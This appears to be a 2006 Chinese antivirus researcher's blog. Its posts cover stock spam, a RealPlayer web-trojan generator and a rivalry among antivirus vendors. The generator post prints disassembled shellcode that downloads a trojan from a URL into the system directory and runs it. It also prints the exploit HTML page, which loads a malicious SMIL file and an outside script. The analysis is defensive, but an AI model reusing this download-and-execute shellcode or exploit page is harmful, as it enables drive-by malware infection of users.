加糖苦咖啡 | daishuo’s blog

2006年01月25日

传说中的股票垃圾邮件

早就看过了这个：AOL发布2005年最常见垃圾邮件股票诈骗居首位。当时的感觉是郁闷，因为从来没有收到过股票垃圾邮件。今天早上的一封spam终于让我一睹股票垃圾邮件的芳容：

信是HTML格式的，就显示了一个GIF图片（即上图），图片上随机出现的噪音点有明显的反Anti-spam的痕迹。

本篇文章使用aigaogao Blog软件发布, “我的Blog要备份”

归类于： 1.反病毒 — daishuo @ 2:40 pm 评论(0)

2006年01月24日

我的春节日程表

sftime

归类于： 1.反病毒 — daishuo @ 2:33 am 评论(0)

也说说”Realplayer牛X版网马生成器”

首先说声"sorry"，节前杂事太多，有段时间没有更新blog了。今天上班看到古典辣M转载了一篇《关于Realplayer牛X版网页木马生成器》，谈到了这个网马生成器有后门。前段时间恰好看过这个生成器，似乎没有此文描述得那么恶劣，写出来也算给它平个反吧。

生成器作者的blog: http://www.91blog.com/user3/4166/index.shtml

1. 嵌于music.smi当中的shellcode虽然个头超过1K，但除了一堆NOP之外，有效代码只有382字节，除下载运行指定程序外，没有其他任何功能，更没有所谓的“后门代码”（见下面IDA截选）。KV可查此类恶意smi文件，病毒名称为Exploit.RealPlay.SMIL。

sub_9E   proc near               ; CODE XREF: seg000:00000142p
         pop     edi
         mov     eax, large fs:30h
         mov     eax, [eax+0Ch]
         mov     esi, [eax+1Ch]
         lodsd
         mov     ebp, [eax+8]    ; kernel32.dll imagebase
         mov     esi, edi
         push    4
         pop     ecx

loc_B4:                         ; CODE XREF: sub_9E+1Bj
         call    sub_FD
         loop    loc_B4
         push    'no'
         push    'mlru'          ; urlmon
         push    esp
         call    dword ptr [esi] ; LoadLibraryA
         mov     ebp, eax
         call    sub_FD
         sub     esp, 20h
         mov     ebx, esp
         push    20h ; ' '
         push    ebx
         call    dword ptr [esi+4] ; GetSystemDirectoryA
         mov     dword ptr [ebx+eax], 'e.a\'
         mov     dword ptr [ebx+eax+4], 'ex'
         xor     eax, eax
         push    eax
         push    eax
         push    ebx             ; %systemdir%\a.exe
         push    edi             ; trojan url
         push    eax
         call    dword ptr [esi+10h] ; UrlDownloadToFile
         mov     ebx, esp
         push    eax
         push    ebx
         call    dword ptr [esi+8] ; WinExec
         call    dword ptr [esi+0Ch] ; ExitThread
sub_9E  endp

2. 网页解密用的是“臭蛋黄的解码驱动”，很容易解出引用.SMI的网页源码：

<html>
<head></head>
<body bgcolor="#000000" text="#ffffff" leftmargin="0" topmargin="0" >
<table width="450" height="350" border="1" align="center" cellpadding="0" 
cellspacing="0">  
<tr>     
  <td align="center">
  <object id="player" name="player" classid="clsid:CFCDAA03-8BE4-11cf-B84B
  -0020AFBBCCFA" width="100%" height="100%">
  <param name="CONTROLS" value="Imagewindow">
  <param name="CONSOLE" value="clip1">
  </object></td>
</tr>
<tr>
  <td height="25">
  <table width="100%" border="0" align="center" cellpadding="0" 
  cellspacing="0">
  <td align="center" bgcolor="#000000">
  <table  border=1 cellpadding=0 cellspacing=0 width="100%">
  <td width="50"><INPUT onClick="document.player.SetFullScreen()" 
  type=button value=full ) name=Submit style="BACKGROUND-COLOR: #eeeeee; 
  BORDER-BOTTOM: #a2a2a2 1px solid; BORDER-LEFT: #ffffff 1px solid; 
  BORDER-RIGHT: #a2a2a2 1px solid; BORDER-TOP: #ffffff 1px solid; 
  COLOR: #333333; FONT-SIZE: 12px; HEIGHT: 25px; width: 180px">
  </td>
  <td>
  <object ID="RP2" CLASSID="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" 
  WIDTH="100%" HEIGHT="25">
  <param name="_ExtentX" value="4657">
  <param name="_ExtentY" value="794">
  <param name="AUTOSTART" value="-1">
  <PARAM NAME="SRC" VALUE="music.smi ">
  <param name="SHUFFLE" value="0">
  <param name="PREFETCH" value="0">
  <param name="NOLABELS" value="-1">
  <param name="CONTROLS" value="ControlPanel">
  <param name="CONSOLE" value="clip1">
  <param name="LOOP" value="0">
  <param name="NUMLOOP" value="0">
  <param name="CENTER" value="0">
  <param name="MAINTAINASPECT" value="0">
  <param name="BACKGROUNDCOLOR" value="#000000"></object>
  <script language="javascript">
    player.SetEnableContextMenu(false);
    player.SetWantErrors(true);
  </script></td>
</tr>
  </table></td></tr>
<tr>
  <td align="center" bgcolor="#000000"><object classid=clsid:CFCDAA03-
  8BE4-11cf-B84B-0020AFBBCCFA height=25 id="RP3" name="RP3" width=100%>
  <param name="CONTROLS" value="StatusBar">
  <param name="CONSOLE" value="clip1">
  </object></td></tr>
  </table></td>
</tr></table>
<script src=http://www.wocao.net/js/wocao2.ocx 
language="JScript.Encode">
</script></body></html>

尾部的确引用了http://www.wocao.net/js/wocao2.ocx，如果wocao.net的作者修改wocao2.ocx的话，会被所有牛X版RM网马引用。不过目前为止，这个wocao2.ocx还只是“臭蛋黄解密驱动”脚本而已，全无危害。虽然生成器作者有留后门的迹象，但“后门”一事尚未成真。

归类于： 1.反病毒 — daishuo @ 2:16 am 评论(1)

2006年01月17日

瑞星05年网络安全报告读后感

瑞星发布了05年网络安全报告，让我觉得最有“收获”的是这段话：

....由于流氓软件越来越趋于商业化、集团化，并且已经形成了一根完整的
产业链条。很多正规的软件公司和共享软件作者加入到流氓软件的黑色利益
链条中来，这大大加强了流氓软件的传播能力。
例如，某反病毒软件厂商一边举着打击流氓软件的幌子，一边通过流氓
软件、流氓网站推广自己的杀毒软件产品。当用户上网时，就会频繁收到弹
出式广告：“你的计算机可能已经中毒，请立即下载xxxx进行杀毒”。
同时，当用户电脑上没装杀毒软件时，该厂商会强行为用户安装杀毒软件。

我如果没有理解错误的话，瑞星在说金山是流氓软件幕后黑手之一。理由是下面一幅很多网友都眼熟的图片：

看了瑞星的报告，我下意识的翻出了Eugene Kaspersky两个月前发表的一篇分析：The contemporary antivirus industry and its problems。我想摘引一段，

.... In spite of market segmentation of antivirus companies
(which happens with any market, without exception),
antivirus companies do work with each other. If a new worm which
propagates quickly is detected by one antivirus company, the
analysts will inform competitor companies almost immediately,
and forward a sample of the worm. And the majority of antivirus
companies exchange virus samples at least one a month. They also
exchange information at dedicated professional gatherings, which
are not open to those outside the industry. It could be seen as
professional ethics; antivirus companies do share information
with other antivirus companies, except for those companies which
may have damaged their standing in the antivirus world through
unethical behaviour.

国外AV厂商健康的技术氛围和竞争关系是国内几家需要仰视的。我希望同行们都能看到Kaspersky上面这段文字，并且可以在口水战的间隙耐心读懂这几行英文。

你知我知，大家都是流氓，都少不了谎言和垃圾，似乎没有必要在流氓圈里拼出老大老二，贻笑大方吧。

本篇文章使用aigaogao Blog软件发布, “我的Blog要备份”